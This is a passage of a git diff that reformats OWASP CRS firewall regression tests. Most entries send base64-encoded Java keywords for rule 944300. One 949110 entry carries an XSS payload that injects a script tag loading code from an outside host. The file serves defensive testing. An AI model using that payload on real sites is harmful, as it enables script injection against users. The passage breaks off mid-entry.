"en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: 
"HTTP/1.0" - data: "d2hpbGVjbG9zdXJl" - output: - log_contains: "id \"944300\"" - - test_title: 944300-306 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "d2hpbGVjbG9zdXJl" + output: + log: + expect_ids: [944300] + - test_id: 306 desc: "Content-Type text/plain includes keyword d2hpbGVjbG9zdXJl" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=d2hpbGVjbG9zdXJl" - output: - log_contains: "id \"944300\"" - - test_title: 944300-307 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=d2hpbGVjbG9zdXJl" + output: + log: + expect_ids: [944300] + - test_id: 307 desc: "Content-Type application/json arg value includes keyword d2hpbGVjbG9zdXJl" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: 
"en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"d2hpbGVjbG9zdXJl\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-308 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"d2hpbGVjbG9zdXJl\"}" + output: + log: + expect_ids: [944300] + - test_id: 308 desc: "Content-Type application/json arg name includes keyword d2hpbGVjbG9zdXJl" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"d2hpbGVjbG9zdXJl\": \"test\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-309 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"d2hpbGVjbG9zdXJl\": \"test\"}" + output: + log: + expect_ids: [944300] + - test_id: 309 desc: "Argument test includes keyword HdoaWxlY2xvc3VyZQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=HdoaWxlY2xvc3VyZQ" - output: - log_contains: "id \"944300\"" - - test_title: 944300-310 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=HdoaWxlY2xvc3VyZQ" + output: + log: + expect_ids: [944300] + - test_id: 310 desc: "Argument name includes keyword HdoaWxlY2xvc3VyZQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "HdoaWxlY2xvc3VyZQ=test" - output: - log_contains: "id \"944300\"" - - test_title: 944300-311 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "HdoaWxlY2xvc3VyZQ=test" + output: + log: + expect_ids: [944300] + - test_id: 311 desc: "Cookie test includes keyword HdoaWxlY2xvc3VyZQ" 
stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=HdoaWxlY2xvc3VyZQ - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-312 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=HdoaWxlY2xvc3VyZQ + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 312 desc: "Cookie name includes keyword HdoaWxlY2xvc3VyZQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: HdoaWxlY2xvc3VyZQ=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-313 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: 
HdoaWxlY2xvc3VyZQ=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 313 desc: "Request header test includes keyword HdoaWxlY2xvc3VyZQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: HdoaWxlY2xvc3VyZQ - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-314 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: HdoaWxlY2xvc3VyZQ + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 314 desc: "XML attribute value includes keyword HdoaWxlY2xvc3VyZQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-315 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944300] + - test_id: 315 desc: "XML element value includes keyword HdoaWxlY2xvc3VyZQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "HdoaWxlY2xvc3VyZQ" - output: - log_contains: "id \"944300\"" - - test_title: 944300-316 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "HdoaWxlY2xvc3VyZQ" + output: + log: + expect_ids: [944300] + - test_id: 316 desc: "Nested XML element value includes keyword HdoaWxlY2xvc3VyZQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "HdoaWxlY2xvc3VyZQ" - output: - log_contains: "id \"944300\"" - - test_title: 944300-317 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + 
Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "HdoaWxlY2xvc3VyZQ" + output: + log: + expect_ids: [944300] + - test_id: 317 desc: "Content-Type text/plain includes keyword HdoaWxlY2xvc3VyZQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=HdoaWxlY2xvc3VyZQ" - output: - log_contains: "id \"944300\"" - - test_title: 944300-318 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=HdoaWxlY2xvc3VyZQ" + output: + log: + expect_ids: [944300] + - test_id: 318 desc: "Content-Type application/json arg value includes keyword HdoaWxlY2xvc3VyZQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"HdoaWxlY2xvc3VyZQ\"}" - output: - 
log_contains: "id \"944300\"" - - test_title: 944300-319 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"HdoaWxlY2xvc3VyZQ\"}" + output: + log: + expect_ids: [944300] + - test_id: 319 desc: "Content-Type application/json arg name includes keyword HdoaWxlY2xvc3VyZQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"HdoaWxlY2xvc3VyZQ\": \"test\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-320 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"HdoaWxlY2xvc3VyZQ\": \"test\"}" + output: + log: + expect_ids: [944300] + - test_id: 320 desc: "Argument test includes keyword B3aGlsZWNsb3N1cmU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" 
- Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=B3aGlsZWNsb3N1cmU" - output: - log_contains: "id \"944300\"" - - test_title: 944300-321 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=B3aGlsZWNsb3N1cmU" + output: + log: + expect_ids: [944300] + - test_id: 321 desc: "Argument name includes keyword B3aGlsZWNsb3N1cmU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "B3aGlsZWNsb3N1cmU=test" - output: - log_contains: "id \"944300\"" - - test_title: 944300-322 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "B3aGlsZWNsb3N1cmU=test" + output: + log: + expect_ids: [944300] + - test_id: 322 desc: "Cookie test includes keyword B3aGlsZWNsb3N1cmU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=B3aGlsZWNsb3N1cmU - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-323 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=B3aGlsZWNsb3N1cmU + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 323 desc: "Cookie name includes keyword B3aGlsZWNsb3N1cmU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: B3aGlsZWNsb3N1cmU=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-324 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: B3aGlsZWNsb3N1cmU=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 324 desc: "Request 
header test includes keyword B3aGlsZWNsb3N1cmU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: B3aGlsZWNsb3N1cmU - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-325 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: B3aGlsZWNsb3N1cmU + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 325 desc: "XML attribute value includes keyword B3aGlsZWNsb3N1cmU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-326 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + 
version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944300] + - test_id: 326 desc: "XML element value includes keyword B3aGlsZWNsb3N1cmU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "B3aGlsZWNsb3N1cmU" - output: - log_contains: "id \"944300\"" - - test_title: 944300-327 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "B3aGlsZWNsb3N1cmU" + output: + log: + expect_ids: [944300] + - test_id: 327 desc: "Nested XML element value includes keyword B3aGlsZWNsb3N1cmU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "B3aGlsZWNsb3N1cmU" - output: - log_contains: "id \"944300\"" - - test_title: 944300-328 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + 
Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "B3aGlsZWNsb3N1cmU" + output: + log: + expect_ids: [944300] + - test_id: 328 desc: "Content-Type text/plain includes keyword B3aGlsZWNsb3N1cmU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=B3aGlsZWNsb3N1cmU" - output: - log_contains: "id \"944300\"" - - test_title: 944300-329 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=B3aGlsZWNsb3N1cmU" + output: + log: + expect_ids: [944300] + - test_id: 329 desc: "Content-Type application/json arg value includes keyword B3aGlsZWNsb3N1cmU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"B3aGlsZWNsb3N1cmU\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-330 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"B3aGlsZWNsb3N1cmU\"}" + output: + log: + expect_ids: [944300] + - test_id: 330 desc: "Content-Type application/json arg name includes keyword B3aGlsZWNsb3N1cmU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"B3aGlsZWNsb3N1cmU\": \"test\"}" - output: - log_contains: "id \"944300\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"B3aGlsZWNsb3N1cmU\": \"test\"}" + output: + log: + expect_ids: [944300] diff --git a/tests/regression/tests/REQUEST-949-BLOCKING-EVALUATION/949110.yaml b/tests/regression/tests/REQUEST-949-BLOCKING-EVALUATION/949110.yaml index 33c049be4..90685d508 100644 --- a/tests/regression/tests/REQUEST-949-BLOCKING-EVALUATION/949110.yaml +++ b/tests/regression/tests/REQUEST-949-BLOCKING-EVALUATION/949110.yaml 
@@ -1,92 +1,91 @@ --- meta: author: "studersi, azurit" - enabled: true - name: "949110.yaml" description: | Test whether the inbound blocking mechanism works by testing whether rule 949110 is triggered. For these tests, existing test are repurposed with different assertions. Instead of asserting that the original rules are triggered that the tests are written for, we assert that triggering these rules causes the blocking rule to be triggered. +rule_id: 949110 tests: - - test_title: 949110-1 + - test_id: 1 desc: Test is basically identical to 941100-1 (XSS positive test in phase 2) but here we assert that the inbound blocking mechanism is triggered stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: GET - port: 80 - uri: '/get/demo/xss/xml/vuln.xml.php?input=setTimeout("top.frame2.location="javascript:(function+()+{var+x+=+document.createElement(\\"script\\");x.src+=+\\"//sdl.me/popup.js?//\\";document.childNodes\\[0\\].appendChild(x);}());"",1000)&//' - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - log_contains: id "949110" - - test_title: 949110-2 + - input: + dest_addr: 127.0.0.1 + method: GET + port: 80 + uri: 